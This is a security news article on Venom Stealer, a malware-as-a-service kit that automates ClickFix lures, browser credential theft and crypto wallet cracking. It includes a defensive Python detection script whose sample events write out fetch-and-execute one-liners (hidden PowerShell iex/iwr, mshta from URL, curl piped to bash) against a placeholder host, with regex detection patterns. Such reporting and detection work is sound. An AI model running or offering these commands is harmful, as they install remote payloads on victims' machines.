Dark Reading
Venom Stealer MaaS Platform Commoditizes ClickFix Attacks
A new service on the cybercrime market provides automated capabilities to create persistent information-stealing social engineering attacks.
Elizabeth Montalbano, Contributing Writer
April 1, 2026
4 Min Read
Developing ClickFix-style attacks has just gotten much easier, thanks to a newly distributed malware-as-a-service (MaaS) platform that automates every step of the social engineering technique for would-be attackers, researchers have found.
A developer operating under the name "VenomStealer" is selling a MaaS platform of the same name on cybercriminal forums and networks, researchers from BlackFog revealed in a report published Tuesday. Venom Stealer allows attackers to create a persistent, multistage pipeline from initial infection to credential theft, cryptocurrency wallet access, and data exfiltration based on the initial ClickFix interaction.
"Venom stands out from commodity stealers like Lumma, Vidar, and RedLine because it goes beyond credential harvesting," BlackFog founder and CEO Darren Williams wrote in the report. "It builds ClickFix social engineering directly into the operator panel, automates every step after initial access, and creates a continuous exfiltration pipeline that does not end when the initial payload finishes running."
Touted on cybercriminal forums as "the Apex Predator of Wallet Extraction," the platform is sold on a subscription basis for $250 a month, or $1,800 for lifetime access, according to Williams. There is a vetted application process, Telegram-based licensing, and a 15% affiliate program for Venom Stealer, which delivers a native C++ binary payload compiled per operator from the web panel.
Unlike traditional stealers that simply execute once, exfiltrate data, and exit, Venom Stealer continuously scans the system to harvest credentials, session cookies, and browser data; targets cryptocurrency wallets and stored secrets; and automates wallet cracking and fund draining, according to BlackFog's report.
Moreover, despite its relatively new presence on the commodity MaaS market, the operation behind Venom Stealer already appears to be a thriving business, Williams noted. So far in the month of March alone, its developer has already shipped multiple updates to the platform.
Step-By-Step ClickFix by Design
An attack built with Venom Stealer begins when a prospective victim lands on a ClickFix page hosted by the operator. The platform ships four templates per platform (Windows and macOS): a fake Cloudflare CAPTCHA, a fake OS update, a fake SSL certificate error, and a fake font install page. Each one asks the target to open a Run dialog or Terminal, copy and paste a command, and hit Enter.
"Because the target initiates execution themselves, the process appears user-initiated and bypasses detection logic built around parent-child process relationships," Williams explained.
Windows payloads available in the kit include .exe, .ps1 (or fileless via PowerShell), .hta, and .bat options, while macOS templates use bash and curl, he said. The platform also gives operators the capability to configure custom domains through Cloudflare DNS, so the panel URL never appears in the command.
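As an added illustration (not code from BlackFog's report or from the Venom Stealer kit), the following Python triage rule scores constructed process-creation events for the traits the article describes: an interpreter launched from Explorer (the parent of Run-dialog launches), hidden windows, in-memory or remotely fetched commands, HTA-from-URL, and curl piped into bash on macOS. The sample events, the trait labels, the `example.invalid` host, and the two-hit threshold are assumptions for the example.

```python
import re
from dataclasses import dataclass

# Run-dialog launches on Windows appear as children of explorer.exe (assumed telemetry model).
RUN_DIALOG_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe", "bash"}
# Command-line traits of pasted ClickFix one-liners; the labels are ours, not BlackFog's.
TRAITS = [
    (r"-(?:e|en|enc|encodedcommand)\s", "encoded PowerShell command"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"\b(?:iex|invoke-expression)\b", "in-memory execution"),
    (r"\b(?:downloadstring|invoke-webrequest|iwr|curl|wget)\b", "remote fetch"),
    (r"\bmshta\s+https?://", "HTA fetched from URL"),
    (r"\|\s*(?:bash|sh)\b", "piped into a shell"),
]

@dataclass
class ProcEvent:
    parent: str   # parent image name
    image: str    # child image name
    cmdline: str  # full command line

def score(ev: ProcEvent) -> list[str]:
    """Return the ClickFix traits present in one process-creation event."""
    hits = []
    if ev.parent.lower() in RUN_DIALOG_PARENTS and ev.image.lower() in INTERPRETERS:
        hits.append("interpreter spawned from Explorer (Run dialog)")
    hits += [label for pat, label in TRAITS if re.search(pat, ev.cmdline, re.I)]
    return hits

def triage(events: list[ProcEvent], min_hits: int = 2) -> list[tuple[str, list[str]]]:
    """Flag events with at least min_hits traits; a lone Explorer child is not enough."""
    return [(ev.image, h) for ev in events if len(h := score(ev)) >= min_hits]

# Constructed sample telemetry (not real captures); example.invalid is a placeholder host.
SAMPLE = [
    ProcEvent("explorer.exe", "powershell.exe",
              'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/v)"'),
    ProcEvent("explorer.exe", "mshta.exe", "mshta https://example.invalid/captcha.hta"),
    ProcEvent("svchost.exe", "powershell.exe", r"powershell.exe -File C:\Scripts\backup.ps1"),
    ProcEvent("Terminal", "bash", 'bash -c "curl -fsSL https://example.invalid/u | bash"'),
    ProcEvent("explorer.exe", "cmd.exe", "cmd /c dir"),
]

if __name__ == "__main__":
    for image, hits in triage(SAMPLE):
        print(f"{image}: {', '.join(hits)}")
```

The scheduled backup script and the plain `cmd /c dir` from the Run dialog fall below the threshold, which is the point: parent-child checks alone miss user-pasted commands, so the rule keys on the command line as well.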
Once the payload executes, it sweeps every Chromium and Firefox-based browser on the machine, extracting saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from every profile.
Moreover, there are evasion capabilities built into the execution mode, with the password encryption in versions 10 and 20 of Chrome bypassed using a silent privilege escalation that extracts the decryption key without triggering any user account control (UAC) dialog, thus leaving no forensic artifacts, Williams noted. The attack chain also captures system fingerprinting and browser extension inventories alongside the credentials, giving cybercriminals a complete profile of each target, he added.
"All of this data leaves the infected device immediately, with little or no local staging or delay," Williams wrote. "Without adequate visibility into outbound traffic, detecting this activity becomes significantly more difficult."
Persistent Data-Theft Pipeline
The attack transfers any discovered wallet data to a server-side, GPU-powered cracking engine that auto-cracks crypto wallets such as MetaMask, Phantom, Solflare, Trust Wallet, Atomic, Exodus, Electrum, Bitcoin Core, Monero, and Tonkeeper. Additionally, a March 9 update to Venom Stealer also added a File Password and Seed Finder, which search the filesystem for locally saved seed phrases, feeding anything found into the cracking pipeline.
"Even targets who avoid saving credentials in their browser are at risk if seed phrases exist anywhere on the machine," Williams wrote.
And while some newer infostealer variants do have some persistence capability, Venom goes further than them all by staying active after the initial compromise and continuously monitoring Chrome’s Login Data, capturing newly saved credentials in real-time, he added.
"This undermines credential rotation as an incident response measure and extends the exfiltration window beyond the initial infection," Williams observed. "As a result, determining the full scope of the ongoing compromise becomes more difficult."
How to Reduce ClickFix Exposure
Researchers from Proofpoint first spotted ClickFix attacks about two years ago, and the technique has taken off with the cybercriminal community since then. The attack instills urgency among targets by telling them something is wrong that they must fix or update, and then uses otherwise benign CAPTCHA-style prompts to lure them into a false sense of security. The aim is to trick users into running malicious commands against themselves.
Organizations can reduce exposure to threats like Venom Stealer by restricting PowerShell execution, disabling the Run dialog for standard users via Group Policy, and training employees to recognize ClickFix-style social engineering, Williams advised.
"Once the payload is running, the attack chain depends on data leaving the device," he wrote. "Monitoring and controlling outbound traffic become important at this point, because it provides an opportunity to detect or prevent exfiltration activity and limit the impact of credential theft and subsequent actions."
About the Author
Elizabeth Montalbano
Contributing Writer
Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.